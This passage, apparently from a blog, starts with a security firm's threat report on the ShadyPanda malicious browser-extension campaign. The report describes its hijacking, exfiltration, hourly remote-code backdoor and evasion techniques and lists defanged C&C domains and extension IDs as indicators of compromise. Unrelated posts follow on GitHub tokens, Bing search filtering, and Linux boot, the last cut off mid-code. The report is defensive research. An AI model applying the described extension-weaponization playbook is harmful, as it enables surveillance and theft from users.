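The attack was simple affiliate fraud. Every time a user clicked on eBay, Amazon, or Booking.com, ShadyPanda's extensions silently injected affiliate tracking codes, earning a hidden commission on every purchase. The extensions also deployed Google Analytics tracking to monetize browsing data: every website visit, search query, and click pattern was logged and sold.

This phase wasn't sophisticated, but it was successful. ShadyPanda learned three critical lessons:

Chrome's review process focuses on the initial submission, not ongoing behavior
Users trust extensions with high install counts and positive reviews
Patience pays off: some extensions operated for months before detection. The longer you look legitimate, the more damage you can do.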

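Phase 2: Search Hijacking Evolution

ShadyPanda got bolder. The next wave, in early 2024, shifted from passive monetization to active browser control.

The Infinity V+ extension exemplifies this phase. Disguised as a new-tab productivity tool, it hijacked several core browser functions:

Search redirection: every web search was redirected through trovi.com, a known browser hijacker. Search queries were logged, monetized, and sold, and search results were manipulated for profit.
Cookie exfiltration: the extension read cookies from specific domains and sent tracking data to nossl.dergoodting.com, creating unique identifiers to monitor browsing activity. All without consent or disclosure.
Search query harvesting: every keystroke in the search box was sent to external servers (s-85283.gotocdn[.]com and s-82923.gotocdn[.]com), allowing real-time profiling of user interests before you even hit Enter. The extension captured partial queries, typos, and corrections, building a fine-grained trace of how you think through a search. All of this traffic went over unencrypted HTTP connections, making the data easy to intercept and monetize. It recorded not just what you search for, but how you think about searching for it.

ShadyPanda was learning and getting more aggressive. But they were still getting caught. Extensions were being reported and removed within weeks or months of deployment.

They needed a better strategy.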

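Phase 3: The Long Game

Five extensions. Three were uploaded in 2018-2019, including Clean Master with 200,000+ installs. All operated legitimately for years and gained Featured and Verified status.

The strategy: build trust, accumulate users, then weaponize via a single update.

Before weaponization, ShadyPanda deployed covert installation tracking to optimize its distribution strategy. This was data-driven malware development.

Mid 2024: after accumulating about 300,000 installs, ShadyPanda pushed the malicious update. Users were infected automatically through Chrome and Edge's trusted auto-update mechanism. All five extensions then began running identical malicious code.

Remote Code Execution: The Hourly Weapon

Every infected browser runs a remote code execution framework. Every hour it polls api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access.

This isn't malware with a fixed function. It's a backdoor. ShadyPanda decides what it does. Today it may be surveillance; tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, once an hour, without end.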

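Complete Browser Surveillance

The current payload monitors every website visit and exfiltrates encrypted data to ShadyPanda's servers:

What gets collected and exfiltrated:

Every URL visited, with full browsing history
HTTP referrers showing navigation patterns
Timestamps for activity profiling
Persistent UUIDv4 identifiers (stored in chrome.storage.sync, so they sync across devices)
Complete browser fingerprints: user agent, language, platform, screen resolution, timezone
All data is encrypted with AES before being sent to api.cleanmasters.store

Evasion & Attack Capabilities

Anti-analysis: the malicious code detects when developer tools are opened and switches to benign behavior to evade analysis. The code is heavily obfuscated (with shortened variable names) and executes through a JavaScript interpreter of about 158KB to bypass Content Security Policy (CSP).
Man-in-the-middle: a service worker can intercept and modify network requests and replace legitimate JavaScript files with malicious ones, enabling credential theft, session hijacking, and content injection into any website, including HTTPS sites.

ShadyPanda can update any of these capabilities hourly. Although the extensions were recently removed from the marketplaces, the infrastructure for full-scale attacks remains deployed on all infected browsers.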

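Phase 4: The Spyware Empire (5 Extensions, 4M+ Users)

However, ShadyPanda's biggest operation wasn't Clean Master. Starlab Technology, the publisher behind Clean Master on Edge, launched 5 additional extensions on Microsoft Edge around 2023, accumulating over 4 million combined installs.

And here's the problem: all 5 extensions are still live in the Microsoft Edge marketplace. Unlike the removed extensions from Phase 3, this surveillance operation against 4 million users is still running.

Two of the five are comprehensive spyware. The flagship, WeTab 新标签页 (WeTab New Tab Page), has 3 million installs on its own. It is disguised as a productivity tool but functions as a sophisticated surveillance platform.

Comprehensive Data Collection

WeTab collects extensive user data and exfiltrates it to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics):

What gets collected:

Every URL visited: complete browsing history transmitted in real time
All search queries: keystroke-level monitoring of what users search for
Mouse click tracking with pixel-level precision: X/Y coordinates and element identification
Browser fingerprinting: screen resolution, language, timezone, user agent
Page interaction data: time on page, scroll behavior, active viewing time
Storage access: reads localStorage and sessionStorage, and can access all cookies

Phase 4 dwarfs the Clean Master operation: 4 million infected users versus 300,000. The extensions remain live in the Microsoft Edge marketplace. They already hold dangerous permissions, including access to all URLs and cookies, and users are still downloading them. ShadyPanda can push updates at any time, weaponizing these 4 million browsers with the same RCE backdoor framework from Phase 3, or something even worse. The infrastructure is in place. The permissions are granted. The update mechanism works automatically.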

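Seven Years of Exploitation

ShadyPanda's success isn't just about technical sophistication. It's about systematically exploiting the same weakness for seven years: marketplaces review extensions at submission. They don't watch what happens after approval.

What linked all these campaigns together: code signing similarities, overlapping infrastructure, and identical obfuscation techniques evolving over time. Same actor. Different masks. Each phase learned from the last, from crude affiliate fraud to patient five-year operations.

The auto-update mechanism, designed to keep users secure, became the attack vector. Chrome and Edge's trusted update pipeline silently delivered malware to users. No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms.

ShadyPanda controls what happens next: session hijacking, credential harvesting, account takeover, supply chain attacks through compromised developers. For enterprises, infected developer workstations mean compromised repositories and stolen API keys. Browser-based authentication to SaaS platforms, cloud consoles, and internal tools means every login is visible to ShadyPanda. Extensions bypass traditional security controls. ShadyPanda has been inside your network for over a year.

The systemic problem isn't just one malicious actor. It's that the security model incentivizes this behavior:

Build something legitimate
Pass review and gain trust signals (installs, reviews, verified badges)
Collect a large user base
Weaponize via update
Profit before detection

ShadyPanda proved this works. And now every sophisticated threat actor knows the playbook.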

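Final Thoughts

One patient threat actor and one lesson: trust is the vulnerability.

ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago: static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn't catch this.

This writeup was authored by the research team at Koi Security.

Koi was built for this moment: behavioral analysis and risk scoring for the extensions your teams pull from marketplaces. We watch what extensions actually do after installation, not what they claim to be.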

Indicators of compromise (IOCs)

C&C domains:

extensionplay[.]com
yearnnewtab[.]com
api.cgatgpt[.]net

Exfiltration domains:

dergoodting[.]com
yearnnewtab[.]com
cleanmasters[.]store
s-85283.gotocdn[.]com
s-82923.gotocdn[.]com

Chrome extensions:

eagiakjmjnblliacokhcalebgnhellfi
ibiejjpajlfljcgjndbonclhcbdcamai
ogjneoecnllmjcegcfpaamfpbiaaiekh
jbnopeoocgbmnochaadfnhiiimfpbpmf
cdgonefipacceedbkflolomdegncceid
gipnpcencdgljnaecpekokmpgnhgpela
bpgaffohfacaamplbbojgbiicfgedmoi
ineempkjpmbdejmdgienaphomigjjiej
nnnklgkfdfbdijeeglhjfleaoagiagig
Mljmfnkjmcdmongjnnnbbnajjdbojoci
llkncpcdceadgibhbedecmkencokjajg
nmfbniajnpceakchicdhfofoejhgjefb
ijcpbhmpbaafndchbjdjchogaogelnjl
olaahjgjlhoehkpemnfognpgmkbedodk
gnhgdhlkojnlgljamagoigaabdmfhfeg
cihbmmokhmieaidfgamioabhhkggnehm
lehjnmndiohfaphecnjhopgookigekdk
hlcjkaoneihodfmonjnlnnfpdcopgfjk
hmhifpbclhgklaaepgbabgcpfgidkoei
lnlononncfdnhdfmgpkdfoibmfdehfoj
nagbiboibhbjbclhcigklajjdefaiidc
ofkopmlicnffaiiabnmnaajaimmenkjn
ocffbdeldlbilgegmifiakciiicnoaeo
eaokmbopbenbmgegkmoiogmpejlaikea
lhiehjmkpbhhkfapacaiheolgejcifgd
ondhgmkgppbdnogfiglikgpdkmkaiggk
imdgpklnabbkghcbhmkbjbhcomnfdige

Edge add-ons:

bpelnogcookhocnaokfpoeinibimbeff
enkihkfondbngohnmlefmobdgkpmejha
hajlmbnnniemimmaehcefkamdadpjlfa
aadnmeanpbokjjahcnikajejglihibpd
ipnidmjhnoipibbinllilgeohohehabl
fnnigcfbmghcefaboigkhfimeolhhbcp
nlcebdoehkdiojeahkofcfnolkleembf
fhababnomjcnhmobbemagohkldaeicad
nokknhlkpdfppefncfkdebhgfpfilieo
ljmcneongnlaecabgneiippeacdoimaa
onifebiiejdjncjpjnojlebibonmnhog
dbagndmcddecodlmnlcmhheicgkaglpk
fmgfcpjmmapcjlknncjgmbolgaecngfo
kgmlodoegkmpfkbepkfhgeldidodgohd
hegpgapbnfiibpbkanjemgmdpmmlecbc
gkanlgbbnncfafkhlchnadcopcgjkfli
oghgaghnofhhoolfneepjneedejcpiic
fcidgbgogbfdcgijkcfdjcagmhcelpbc
nnceocbiolncfljcmajijmeakcdlffnh
domfmjgbmkckapepjahpedlpdedmckbj
cbkogccidanmoaicgphipbdofakomlak
bmlifknbfonkgphkpmkeoahgbhbdhebh
ghaggkcfafofhcfppignflhlocmcfimd
hfeialplaojonefabmojhobdmghnjkmf
boiciofdokedkpmopjnghpkgdakmcpmb
ibfpbjfnpcgmiggfildbcngccoomddmj
idjhfmgaddmdojcfmhcjnnbhnhbmhipd
jhgfinhjcamijjoikplacnfknpchndgb
cgjgmbppcoolfkbkjhoogdpkboohhgel
afooldonhjnhddgnfahlepchipjennab
fkbcbgffcclobgbombinljckbelhnpif
fpokgjmlcemklhmilomcljolhnbaaajk
hadkldcldaanpomhhllacdmglkoepaed
iedkeilnpbkeecjpmkelnglnjpnacnlh
hjfmkkelabjoojjmjljidocklbibphgl
dhjmmcjnajkpnbnbpagglbbfpbacoffm
cgehahdmoijenmnhinajnojmmlnipckl
fjigdpmfeomndepihcinokhcphdojepm
chmcepembfffejphepoongapnlchjgil
googojfbnbhbbnpfpdnffnklipgifngn
fodcokjckpkfpegbekkiallamhedahjd
igiakpjhacibmaichhgbagdkjmjbnanl
omkjakddaeljdfgekdjebbbiboljnalk
llilhpmmhicmiaoancaafdgganakopfg
nemkiffjklgaooligallbpmhdmmhepll
papedehkgfhnagdiempdbhlgcnioofnd
glfddenhiaacfmhoiebfeljnfkkkmbjb
pkjfghocapckmendmgdmppjccbplccbg
gbcjipmcpedgndgdnfofbhgnkmghoamm
ncapkionddmdmfocnjfcfpnimepibggf
klggeioacnkkpdcnapgcoicnblliidmf
klgjbnheihgnmimajhohfcldhfpjnahe
acogeoajdpgplfhidldckbjkkpgeebod
ekndlocgcngbpebppapnpalpjfnkoffh
elckfehnjdbghpoheamjffpdbbogjhie
dmpceopfiajfdnoiebfankfoabfehdpn
gpolcigkhldaighngmmmcjldkkiaonbg
dfakjobhimnibdmkbgpkijoihplhcnil
hbghbdhfibifdgnbpaogepnkekonkdgc
fppchnhginnfabgenhihpncnphhafmac
ghhddclfklljabeodmcejjjlhoaaiban
bppelgkcnhfkicolffhlkbdghdnjdkhi
ikgaleggljchgbihlaanjbkekmmgccam
bdhjinjoglaijpffoamhhnhooeimgoap
fjioinpkgmlcioajfnncgldldcnabffe
opncjjhgbllenobgbfjbblhghmdpmpbj
cbijiaccpnkbdpgbmiiipedpepbhioel
fbbmnieefocnacnecccgmedmcbhlkcpm
hmbacpfgehmmoloinfmkgkpjoagiogai
paghkadkhiladedijgodgghaajppmpcg
bafbmfpfepdlgnfkgfbobplkkaoakjcl
kcpkoopmfjhdpgjohcbgkbjpmbjmhgoi
jelgelidmodjpmohbapbghdgcpncahki
lfgakdlafdenmaikccbojgcofkkhmolj
hdfknlljfbdfjdjhfgoonpphpigjjjak
kpfbijpdidioaomoecdbfaodhajbcjfl
fckphkcbpgmappcgnfieaacjbknhkhin
lhfdakoonenpbggbeephofdlflloghhi
ljjngehkphcdnnapgciajcdbcpgmpknc
ejfocpkjndmkbloiobcdhkkoeekcpkik
ccdimkoieijdbgdlkfjjfncmihmlpanj
agdlpnhabjfcbeiempefhpgikapcapjb
mddfnhdadbofiifdebeiegecchpkbgdb
alknmfpopohfpdpafdmobclioihdkhjh
hlglicejgohbanllnmnjllajhmnhjjel
iaccapfapbjahnhcmkgjjonlccbhdpjl
ehmnkbambjnodfbjcebjffilahbfjdml
ngbfciefgjgijkkmpalnmhikoojilkob
laholcgeblfbgdhkbiidbpiofdcbpeeo
njoedigapanaggiabjafnaklppphempm
fomlombffdkflbliepgpgcnagolnegjn
jpoofbjomdefajdjcimmaoildecebkjc
nhdiopbebcklbkpfnhipecgfhdhdbfhb
gdnhikbabcflemolpeaaknnieodgpiie
bbdioggpbhhodagchciaeaggdponnhpa
ikajognfijokhbgjdhgpemljgcjclpmn
lmnjiioclbjphkggicmldippjojgmldk
ffgihbmcfcihmpbegcfdkmafaplheknk
lgnjdldkappogbkljaiedgogobcgemch
hiodlpcelfelhpinhgngoopbmclcaghd
mnophppbmlnlfobakddidbcgcjakipin
jbajdpebknffiaenkdhopebkolgdlfaf
ejdihbblcbdfobabjfebfjfopenohbjb
ikkoanocgpdmmiamnkogipbpdpckcahn
ileojfedpkdbkcchpnghhaebfoimamop
akialmafcdmkelghnomeneinkcllnoih
eholblediahnodlgigdkdhkkpmbiafoj
ipokalojgdmhfpagmhnjokidnpjfnfik
hdpmmcmblgbkllldbccfdejchjlpochf
iphacjobmeoknlhenjfiilbkddgaljad
jiiggekklbbojgfmdenimcdkmidnfofl
gkhggnaplpjkghjjcmpmnmidjndojpcn
opakkgodhhongnhbdkgjgdlcbknacpaa
nkjomoafjgemogbdkhledkoeaflnmgfi
ebileebbekdcpfjlekjapgmbgpfigled
oaacndacaoelmkhfilennooagoelpjop
ljkgnegaajfacghepjiajibgdpfmcfip
hgolomhkdcpmbgckhebdhdknaemlbbaa
bboeoilakaofjkdmekpgeigieokkpgfn
dkkpollfhjoiapcenojlmgempmjekcla
emiocjgakibimbopobplmfldkldhhiad
nchdmembkfgkejljapneliogidkchiop
lljplndkobdgkjilfmfiefpldkhkhbbd
hofaaigdagglolgiefkbencchnekjejl
hohobnhiiohgcipklpncfmjkjpmejjni
jocnjcakendmllafpmjailfnlndaaklf
bjdclfjlhgcdcpjhmhfggkkfacipilai
ahebpkbnckhgjmndfjejibjjahjdlhdb
enaigkcpmpohpbokbfllbkijmllmpafm
bpngofombcjloljkoafhmpcjclkekfbh
cacbflgkiidgcekflfgdnjdnaalfmkob
ibmgdfenfldppaodbahpgcoebmmkdbac

Other coverage

Using a GitHub fine-grained personal access token

2025-11-27T16:00:00.000Z

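When I used a previously created GitHub fine-grained personal access token to modify a file in a repository, the request failed with 403. It turned out that a token whose owner is a personal user account cannot modify files in repositories that belong to an organization.

My username is yiGmMk, and the token works fine for modifying files in repositories under that user.

Cause

When you create a token you can choose its owner. To modify files in an organization's repositories, you need a token whose owner is the organization.

As shown below, a token owned by programnotes-cn is required to modify files in that organization's repositories:

Settings page: https://github.com/settings/personal-access-tokens

Two options

A personal GitHub fine-grained personal access token can modify files in repositories owned by an organization, provided it is set up correctly.

Option 1: Use a fine-grained token

Recommended and more secure, but it requires some configuration.

The resource owner must be chosen correctly:
When creating the token, "Resource owner" must not be yourself (your username); you must pick the organization from the drop-down menu.
- Note: if the organization does not appear in the drop-down menu, the organization has disallowed fine-grained tokens created by non-admins, or you need to enable them in the organization settings first.
An organization admin must approve it (policy):
Many organizations block fine-grained token access to private repositories by default.
- Ask an organization Owner/Admin to go to Organization Settings -> Third-party access -> Personal access tokens -> Settings.
- Make sure "Allow access via fine-grained personal access tokens" is selected.
Permissions:
Under Repository permissions, you must explicitly enable:
- Contents: Read and write (required for modifying files)
- Metadata: Read-only (required, selected by default)

Option 2: Use a personal access token (classic) (simplest, most likely to work)

If option 1 is too much trouble (for example, you are not an admin and do not want to ask one to change the settings), the most direct approach is to go back to a classic token.

Steps:

Go to GitHub Settings -> Developer settings.
Select Personal access tokens -> Tokens (classic).
Click Generate new token (classic).
Key steps:
- Scopes: check the entire repo checkbox (which includes repo:status, public_repo, and so on). This gives the token read and write access to every repository you have access to, including organization repositories.
- SSO authorization (if the organization uses SAML): after the token is created, if your organization has single sign-on (SSO) enabled, click the "Configure SSO" button next to the token and authorize it for that organization. Without this step the token cannot read or write organization resources even though it has the permissions.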
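
For reference, here is a minimal sketch of the kind of request that fails with 403 when the token's owner is wrong: a file update through the GitHub REST API's "create or update file contents" endpoint (`PUT /repos/{owner}/{repo}/contents/{path}`). The helper name, the repository name `example-repo`, the file path, and the placeholder token are assumptions for illustration; only the organization name comes from the text above. The helper builds the request without sending it.

```python
import base64
import json
import urllib.request


def build_update_request(owner, repo, path, token, new_content, message, sha=None):
    """Build (but do not send) a PUT request that creates or updates a file."""
    url = f"https://api.github.com/repos/{owner}/{repo}/contents/{path}"
    payload = {
        "message": message,
        # The API expects the file body as base64 text.
        "content": base64.b64encode(new_content).decode("ascii"),
    }
    if sha is not None:
        # The blob SHA of the existing file is required when updating it.
        payload["sha"] = sha
    return urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        method="PUT",
        headers={
            "Authorization": f"Bearer {token}",
            "Accept": "application/vnd.github+json",
            "Content-Type": "application/json",
        },
    )


if __name__ == "__main__":
    req = build_update_request(
        "programnotes-cn", "example-repo", "README.md",
        "YOUR_TOKEN", b"hello", "docs: update README",
    )
    print(req.get_method(), req.full_url)
    # To send it: urllib.request.urlopen(req). A urllib.error.HTTPError with
    # code 403 here is the symptom described in this post.
```

With a fine-grained token, the same request succeeds only if the token's resource owner is the organization and Contents is set to read and write.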

Blocking junk sites in Bing search

2025-11-25T16:00:00.000Z

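By default, Bing returns many CSDN articles when you search for code-related topics, and their quality is poor. Add -site:*.csdn.net to the query to filter them out.

Default

Searching for coze, the default URLs are:

China edition https://cn.bing.com/search?q=coze
International edition https://bing.com/search?q=coze

After blocking

China edition https://cn.bing.com/search?q=coze%20-site:*.csdn.net
International edition https://bing.com/search?q=coze%20-site:*.csdn.net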
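
The filtered URLs above can also be generated in code. The sketch below appends one `-site:` term per blocked site and URL-encodes the query; the function name and its parameters are made up for this example.

```python
from urllib.parse import quote


def bing_search_url(query, blocked_sites=(), base="https://cn.bing.com/search"):
    """Build a Bing search URL that excludes the given sites via -site: terms."""
    terms = [query] + [f"-site:{site}" for site in blocked_sites]
    # Keep ':' and '*' readable; spaces become %20.
    return f"{base}?q={quote(' '.join(terms), safe=':*')}"


if __name__ == "__main__":
    print(bing_search_url("coze", ["*.csdn.net"]))
    print(bing_search_url("coze", ["*.csdn.net"], base="https://bing.com/search"))
```

Passing more entries in `blocked_sites` adds further `-site:` terms to the same query.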

Configuration

If you use the Infinity extension, you can configure it like this:

Translation | The Linux boot process: from power button to kernel

2025-11-02T16:00:00.000Z

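Part 1: From the power button to the kernel's first steps

You press the power button, and a moment later a waterfall of text scrolls by or a logo quietly appears: Linux has arrived. It looks like magic, but it is really a chain of precise handshakes between small pieces of code and the CPU. This article follows that handshake all the way to the first line of C code in the Linux kernel.

The very first instruction

Once power is stable, the CPU pulls itself back into a tiny, ancient mode called real mode. It dates back to the original 8086 chip, and its rules are deliberately simple: a memory address is built from a pair of register values, the segment and the offset: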

physical_address = (segment << 4) + offset

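You will see numbers like 0xFFFFFFF0. This is hexadecimal (hex), marked by the 0x prefix. 0x10 is 16 in decimal, and 0x100000 is 1 MB. Hex maps neatly onto how hardware stores bits, so it shows up everywhere in low-level code.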
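
As a quick worked example of the segment and offset formula, the Python below computes a few real-mode addresses. The function name and the sample values are chosen for illustration only.

```python
def real_mode_address(segment: int, offset: int) -> int:
    """physical_address = (segment << 4) + offset, with 16-bit inputs."""
    if not (0 <= segment <= 0xFFFF and 0 <= offset <= 0xFFFF):
        raise ValueError("segment and offset must each fit in 16 bits")
    return (segment << 4) + offset


if __name__ == "__main__":
    # Two different segment:offset pairs can name the same physical byte.
    print(hex(real_mode_address(0x07C0, 0x0000)))  # 0x7c00
    print(hex(real_mode_address(0x0000, 0x7C00)))  # 0x7c00
    print(hex(real_mode_address(0xFFFF, 0x0000)))  # 0xffff0
```

Shifting the segment left by 4 bits is the same as multiplying it by 16, which is why the two forms of the formula are interchangeable.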

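After reset, the CPU jumps to a special address, the reset vector 0xFFFFFFF0. Think of it as a permanent bookmark that says "start here". There is very little room at that address, so motherboard vendors usually place a far jump there that hands control to the firmware on the board.

Note: a register is a small slot inside the CPU that holds a value currently in use. CS and IP are register names: CS is the code segment, which marks the "neighborhood" of the current instruction, and IP is the instruction pointer, which marks where the next instruction is.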

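BIOS and UEFI

Firmware is a small boot program burned into the motherboard.

BIOS (Basic Input Output System) is the old-school approach. After a power-on self-test (POST), it probes devices in a preset order. If the first 512 bytes of a disk end with the signature 0x55AA, BIOS treats that disk as bootable. It copies the sector to memory at 0x7C00 and jumps there to continue execution. The sector is tiny, usually just enough to pull in a larger loader.
UEFI is the modern replacement. It also starts the machine, but it understands file systems directly and can load larger boot programs without the old first-sector dance. UEFI can also pass richer information to the operating system. The paths differ but the goal is the same: hand control to a boot program that can load Linux.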
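
The BIOS check described above is easy to reproduce on a disk image. The sketch below tests whether a 512-byte sector ends with the bytes 0x55 then 0xAA; the function name and the image path in the usage comment are hypothetical.

```python
SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"  # last two bytes of a bootable first sector


def looks_bootable(sector: bytes) -> bool:
    """Return True if the sector is 512 bytes long and ends with 0x55 0xAA."""
    return len(sector) == SECTOR_SIZE and sector[-2:] == BOOT_SIGNATURE


if __name__ == "__main__":
    fake_sector = bytes(SECTOR_SIZE - 2) + BOOT_SIGNATURE
    print(looks_bootable(fake_sector))         # True
    print(looks_bootable(bytes(SECTOR_SIZE)))  # False
    # For a real image (hypothetical path):
    # with open("disk.img", "rb") as f:
    #     print(looks_bootable(f.read(SECTOR_SIZE)))
```

The signature only tells the firmware that the sector claims to be bootable; it says nothing about what the code in the sector does.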

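Meet the bootloader

The bootloader is the doorman that ushers the operating system in. GRUB is a common choice on PCs. It reads its configuration, shows a menu (if you configured one), and loads the Linux kernel into memory. The kernel file actually contains two parts:

A small setup program that still runs in real mode;
A larger compressed kernel that will be decompressed later.

GRUB also fills in key information in a small structure called the setup header: where the kernel was placed, where the command line is, whether there is an initrd, and so on. It then jumps straight to the setup program.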

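The setup program makes a safe room

Before Linux can do anything interesting, the setup code needs to create a predictable working environment:

Align the segment registers so that memory copies behave the same way every time. Here you will see CS (code segment), DS (data segment), and SS (stack segment). The code also clears a CPU bit called the direction flag so that copy instructions move forward.
Set up a stack. The stack is a last-in, first-out workbench where functions keep temporary values. SS selects the segment the stack uses, and SP points to the current top of the stack.
Zero the BSS. The BSS region holds global variables that must start at zero. C code assumes the BSS is zero, and the setup program writes zeros across the whole span to keep that promise.
If you passed earlyprintk on the kernel command line, the setup code also programs the serial port to print very early messages, which is especially useful before graphics are ready.
Finally, the setup program asks the firmware how much usable RAM there is and where the holes are. On legacy BIOS this call is nicknamed e820, and it returns a simple list of usable and reserved ranges. The kernel uses this list to avoid stepping on the firmware's toes.

With that done, the setup code calls its first C function, which is simply named main. At this point we are still in that small, ancient real mode...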

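Part 2: Leaving real mode, passing through 32-bit, arriving at 64-bit

On PCs, modern Linux runs in long mode (64-bit, x86_64). You cannot jump directly from real mode to long mode; the path is real mode → protected mode → long mode. This part explains that path and the related terms.

Protected mode, in plain terms

Protected mode is the 32-bit world introduced to escape the limits of the 1980s. It adds two core tools:

GDT (Global Descriptor Table): a short list of segment descriptors. Each entry says where the segment starts, how much it covers, and what is allowed. Linux keeps it simple and uses a flat model: base 0, with a size that covers the entire 32-bit space. Once flattened, addresses look like ordinary numbers again.
IDT (Interrupt Descriptor Table): a directory of emergency calls. When an interrupt arrives, the CPU looks it up in the IDT and jumps to the registered handler. During the switch we first load a tiny placeholder IDT, because interrupts are about to be masked; the real, fully functional IDT is installed after entering the real kernel.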

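The careful switch

The setup code first silences the noisy parts: it disables maskable interrupts with a single instruction and quiets the legacy PIC chip so that hardware interrupts are fully blocked for now; it opens the A20 line (a historical switch) so addresses do not wrap around at 1 MB; and it resets the math coprocessor so the floating-point state is clean.

It then loads a mini GDT and a mini IDT containing only the required entries. Finally it sets the PE bit (Protected Mode Enable) in CR0 and performs a far jump. This jump reloads the code segment from the GDT and locks in protected mode; the code also reloads the data and stack segments and adjusts the stack pointer to match the new flat world.

We are now in 32-bit protected mode.

Note: control registers

CR0: the master switch that turns on protected mode.
CR3: holds the address of the top-level page table, which we will use shortly.
CR4: enables extended features such as larger page table entries (including PAE).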

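Why we are not done yet

Linux wants 64-bit, that is, long mode. Two more things are needed:

Paging must be turned on. Paging is the translator between virtual and physical addresses. Programs use virtual addresses, and the hardware reads and writes physical memory. Page tables map memory in fixed-size pages (typically 4 KB). During early boot the kernel often uses 2 MB large pages to describe low memory quickly.
A bit named LME must be set in EFER (a model-specific register) to allow long mode.

Building just enough paging

The 32-bit prologue builds a small set of page tables that say "in this region, virtual addresses equal physical addresses". This is called an identity map, and it is enough to turn paging on safely.

To do this, the code enables PAE in CR4 so that larger page table entries are used; builds a minimal set of page tables covering low memory, laid out quickly with 2 MB pages; and writes the address of the top-level page table into CR3. Paging is now ready.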
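
To make the identity map with 2 MB pages more concrete, here is a toy model in Python, not kernel code. It lists the virtual-to-physical pairs for an identity map and splits a virtual address into table indexes using the standard x86_64 4-level layout (9-bit indexes at bit positions 39, 30, and 21, with a 21-bit offset inside a 2 MB page). How the kernel actually lays out its early tables is not described in the text, so the function names and structure here are assumptions.

```python
PAGE_2M = 2 * 1024 * 1024


def identity_map_2m(size_bytes: int) -> list[tuple[int, int]]:
    """Return (virtual, physical) pairs, one per 2 MB page, covering [0, size)."""
    pages = (size_bytes + PAGE_2M - 1) // PAGE_2M  # round up to whole pages
    return [(i * PAGE_2M, i * PAGE_2M) for i in range(pages)]


def split_virtual_address(vaddr: int) -> dict[str, int]:
    """Split an address into table indexes and the offset within a 2 MB page."""
    return {
        "pml4": (vaddr >> 39) & 0x1FF,
        "pdpt": (vaddr >> 30) & 0x1FF,
        "pd": (vaddr >> 21) & 0x1FF,
        "offset": vaddr & (PAGE_2M - 1),
    }


if __name__ == "__main__":
    mapping = identity_map_2m(1 << 30)  # first 1 GB
    print(len(mapping))                 # 512 entries, one per 2 MB page
    print(split_virtual_address(0x200000))
```

With 2 MB pages, one page directory of 512 entries covers 1 GB, which is why a handful of tables is enough for early boot.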

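Finally it sets the LME bit in EFER and uses a far return to jump to a label written in 64-bit syntax. Long mode is now active. Segments are still flat, but addresses and registers are now 64 bits wide.

Why so careful? Switching modes on a live system is like changing a tire while the car is moving. The code first blocks interruptions, prepares the minimum set of tables, then flips the key bits, and only then allows interrupts again. A careful order avoids strange half-switched states.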

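Part 3: Unpacking the real kernel, fixing up addresses, and why the kernel moves itself

We now have a 64-bit CPU, paging is on, and a compressed kernel sits in memory. A small 64-bit stub does the real work: it moves itself out of the way if needed, unpacks the kernel, fixes up addresses if the kernel is not at its default location, and finally jumps.

Clearing the path and setting up a safety net

The stub first figures out where it is actually running. The early code is linked as if it lived at address 0 and computes its real base address at run time. If the planned destination of the decompressed kernel would overlap the stub, it copies itself to a safe location first.

It zeroes its own BSS so that global state starts clean.

It loads a minimal IDT with just two handlers: one for page faults and one for NMI (non-maskable interrupt). A page fault happens when the CPU tries to use a virtual address that has no mapping. In our early identity-mapped world, this small page fault handler can add the missing mapping on the fly and continue. The NMI handler makes sure a sudden non-maskable interrupt does not crash the machine while the system is still being brought up.

It also builds identity mappings for the regions it is about to touch, including the kernel's future home, the boot parameters page filled in by the bootloader, and the command-line buffer.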

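Decompressing Linux...

A C function, usually named extract_kernel, takes over. It carves out a small heap as scratch space, prints that classic message, and then decompresses using the algorithm chosen when the kernel was built. gzip, xz, zstd, lzo, and others all plug in through the same wrapper.

Once the bytes are unpacked, the decompressor reads the kernel's ELF (Executable and Linkable Format) header. ELF is both a file format and a map: which parts are code, which are data, and exactly where each piece should go. The decompressor follows the map and copies each piece to its place.

If the kernel was loaded at an address different from the one it was built for, the decompressor applies relocations. A relocation is a small fix to an instruction or pointer that contains an address. The decompressor walks the list of fixes and patches each location so that it points to the right place in the address space actually in use.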

当一切就绪，解压器返回“真正内核”的入口地址，并跳转过去，同时传入指向启动参数的指针。从那一刻起，你已经进入完整内核。遇到的第一个函数是 start_kernel，大型初始化随即开始。

为什么内核会主动“搬家”（kASLR）

你可能在内核日志中看到过 kASLR（Kernel Address Space Layout Randomization，内核地址空间布局随机化）。核心思想非常直接：如果攻击者不知道内核在内存中的确切位置，某些利用会变得更困难。

在启动早期，若启用了 kASLR，解压器会随机选择两个“基址”：

物理基址：内核字节最终驻留的 RAM 物理地址；
虚拟基址：当完整分页机制建立后，内核使用的起始虚拟地址。

它如何在不“踩雷”的前提下做选择？

先建立一个“勿触列表”，包括解压器自身、压缩镜像、初始内存盘（initrd/initramfs）、启动参数页与命令行缓冲区；如果你在命令行传了 memmap= 选项，所保留的区间也会被纳入其中。
扫描固件提供的内存映射，寻找足够大的空闲区域；对每个空闲区域，计算合适尺寸且对齐的“插槽”数；
使用启动早期可用的熵源生成随机数（在现代 CPU 上可能是硬件随机指令）；将随机数映射到插槽总数，挑选对应的插槽，作为物理基址；
虚拟基址以相同方式选择，但限制在内核的虚拟地址窗口范围内。
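
The slot-counting steps above can be sketched as follows. This is an illustrative Go model, not the kernel's implementation: it assumes the free regions have already had the "do not touch" ranges removed, that the alignment is a power of two, and that the random number is supplied by the caller. All type and function names are hypothetical.

```go
package main

import "fmt"

// region is a free physical range [start, start+size) from which everything
// on the avoid list has already been carved out.
type region struct {
	start, size uint64
}

// alignUp rounds addr up to the next multiple of align (a power of two).
func alignUp(addr, align uint64) uint64 {
	return (addr + align - 1) &^ (align - 1)
}

// slotsIn counts the aligned start addresses in r that can hold the image.
func slotsIn(r region, imageSize, align uint64) uint64 {
	first := alignUp(r.start, align)
	end := r.start + r.size
	if first+imageSize > end {
		return 0
	}
	return (end-first-imageSize)/align + 1
}

// pickBase maps random onto the total slot count and returns the address of
// the chosen slot. ok is false when no region offers a slot.
func pickBase(regions []region, imageSize, align, random uint64) (base uint64, ok bool) {
	var total uint64
	for _, r := range regions {
		total += slotsIn(r, imageSize, align)
	}
	if total == 0 {
		return 0, false
	}
	n := random % total
	for _, r := range regions {
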